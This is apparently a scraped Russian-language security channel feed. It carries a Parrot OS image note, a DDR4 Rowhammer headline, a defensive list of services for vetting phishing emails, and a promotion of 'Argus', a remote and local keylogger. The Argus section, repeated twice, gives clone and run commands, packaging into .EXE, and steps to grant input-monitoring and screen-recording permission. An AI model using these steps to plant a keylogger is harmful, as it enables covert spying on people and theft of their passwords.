У Parrot OS на сайте вышел свежий образ Parrot-security-4.11.1_virtual.ova
https://www.parrotsec.org/virtual/
https://www.parrotsec.org/virtual/
Память DDR4 оказалась уязвимой для атак через браузер с помощью простого эксплойта на JavaScript
https://3dnews.ru/1037402/pamyat-ddr4-okazalas-uyazvimoy-dlya-atak-cherez-brauzer-s-pomoshchyu-prosto-eksployta-na-javascript
https://3dnews.ru/1037402/pamyat-ddr4-okazalas-uyazvimoy-dlya-atak-cherez-brauzer-s-pomoshchyu-prosto-eksployta-na-javascript
3DNews - Daily Digital Digest
Память DDR4 оказалась уязвимой для атак через браузер с помощью простого эксплойта на JavaScript
Ещё в 2014 году выяснилось, что компьютерная память уязвима для особого вида атак, получивших название Rowhammer.
Защищаемся от заражения через email
Рассылка спама с вредоносными вложениями — довольно популярный способ распространения различных вирусов и заражения компьютеров пользователей в интернете. Зачастую, вредоносное письмо можно распознать даже по названию. Но бывает, что оно очень хорошо замаскировано и нуждается в подробном анализе. Чтобы бы проверить входящую почту и ее вложения можно воспользоваться сервисами ниже.
1. Верифицируем адрес отправителя email:
https://centralops.net/co/emaildossier.aspx
https://2ip.ru/mail-checker/
http://ru.smart-ip.net/check-email/
https://ivit.pro/services/email-valid/ https://www.xverify.com/
https://mailvalidator.ru/
https://www.zerobounce.net/
https://www.emailmarker.com/
https://quickemailverification.com/
https://emailrep.io/
2. Удостоверяемся в соответствии доменного имени отправителя email:
https://2ip.ru/whois/
http://www.ripn.su/nic/whois/
https://whoer.net/ru/checkwhois
http://www.securrity.ru/whoiz.html
3. Оцениваем безопасность гиперссылок в email:
https://scanurl.net/
https://longurl.info/
https://vms.drweb.ru/online/
https://virusdesk.kaspersky.ru/
https://opentip.kaspersky.com/
4. Анализируем вложенные файлы в "песочницах":
https://cuckoo.cert.ee/
https://www.hybrid-analysis.com/
https://any.run/
Рассылка спама с вредоносными вложениями — довольно популярный способ распространения различных вирусов и заражения компьютеров пользователей в интернете. Зачастую, вредоносное письмо можно распознать даже по названию. Но бывает, что оно очень хорошо замаскировано и нуждается в подробном анализе. Чтобы бы проверить входящую почту и ее вложения можно воспользоваться сервисами ниже.
1. Верифицируем адрес отправителя email:
https://centralops.net/co/emaildossier.aspx
https://2ip.ru/mail-checker/
http://ru.smart-ip.net/check-email/
https://ivit.pro/services/email-valid/ https://www.xverify.com/
https://mailvalidator.ru/
https://www.zerobounce.net/
https://www.emailmarker.com/
https://quickemailverification.com/
https://emailrep.io/
2. Удостоверяемся в соответствии доменного имени отправителя email:
https://2ip.ru/whois/
http://www.ripn.su/nic/whois/
https://whoer.net/ru/checkwhois
http://www.securrity.ru/whoiz.html
3. Оцениваем безопасность гиперссылок в email:
https://scanurl.net/
https://longurl.info/
https://vms.drweb.ru/online/
https://virusdesk.kaspersky.ru/
https://opentip.kaspersky.com/
4. Анализируем вложенные файлы в "песочницах":
https://cuckoo.cert.ee/
https://www.hybrid-analysis.com/
https://any.run/
Argus - Продвинутый кейлоггер для macOS и Windows
Аргус удаленный и локальный кейлоггер Python
Кейлоггер с множеством функций созданный для macOS и Windows
Инструкция по установке на Windows
Первый вариант с использованием pyinstaller
Второй вариант с помощью приложения NSIS
Просто скачайте приложение NSIS с официального сайта и установите его
▫️ запустите приложение NSIS от имени администратора
▫️нажмите кнопку Установить на основе ZIP файла
▫️сожмите сценарий, который вы хотите преобразовать, и откройте или перетащите его в приложение NSIS
▫️нажмите кнопку Создать, и это создаст формат файла .EXE на основе скрипта
Установка на macOS
Перейдите в раздел Системные настройки -> безопасность и конфиденциальность -> конфиденциальность -> разблокировать изменения -> входной мониторинг и включение
Сделайте тот же шаг для записи экрана
Используя ARGUS, вы соглашаетесь с GNU General Public License v2.0, включенной в репозиторий. Для получения более подробной информации здесь. Использование "Аргуса" для нападения на цели без предварительного взаимного согласия незаконно. Конечный пользователь несет ответственность за соблюдение всех применимых местных, государственных и федеральных законов. Разработчики не несут никакой ответственности и не несут ответственности за любое неправильное использование или ущерб, причиненный этой программой.
Аргус удаленный и локальный кейлоггер Python
Кейлоггер с множеством функций созданный для macOS и Windows
Инструкция по установке на Windows
git clone https://github.com/ALDON94/argus.git
cd Argus/Windows/bin/Local or cd Argus/Windows/bin/Remote
pip3 install -r requirements.txt
python3 win-local.py or python3 win-remote.py
Хотите конвертировать скрипт в формат. EXE? Есть два способа, которыми вы можете пойти на этоПервый вариант с использованием pyinstaller
pip3 install pyinstaller
pyinstaller --onefile filename [this is gonna take a while be patient]
Когда это будет сделано, он будет упаковывать кучу папок, пропускать их и просматривать папку dist, которую вы должны увидеть .Формат EXE файла на основе скриптаВторой вариант с помощью приложения NSIS
Просто скачайте приложение NSIS с официального сайта и установите его
▫️ запустите приложение NSIS от имени администратора
▫️нажмите кнопку Установить на основе ZIP файла
▫️сожмите сценарий, который вы хотите преобразовать, и откройте или перетащите его в приложение NSIS
▫️нажмите кнопку Создать, и это создаст формат файла .EXE на основе скрипта
Установка на macOS
git clone https://github.com/ALDON94/argus.git
cd Argus/macos/bin/Local or cd Argus/macos/bin/Remote
pip3 install -r requirements.txt
Включите мониторинг ввода данных для любого приложения из которого вы запускаете скрипт.Перейдите в раздел Системные настройки -> безопасность и конфиденциальность -> конфиденциальность -> разблокировать изменения -> входной мониторинг и включение
Сделайте тот же шаг для записи экрана
sudo python3 osx-local.py or sudo python3 osx-remote.py [run it as root!]
Раскрытие информацииИспользуя ARGUS, вы соглашаетесь с GNU General Public License v2.0, включенной в репозиторий. Для получения более подробной информации здесь. Использование "Аргуса" для нападения на цели без предварительного взаимного согласия незаконно. Конечный пользователь несет ответственность за соблюдение всех применимых местных, государственных и федеральных законов. Разработчики не несут никакой ответственности и не несут ответственности за любое неправильное использование или ущерб, причиненный этой программой.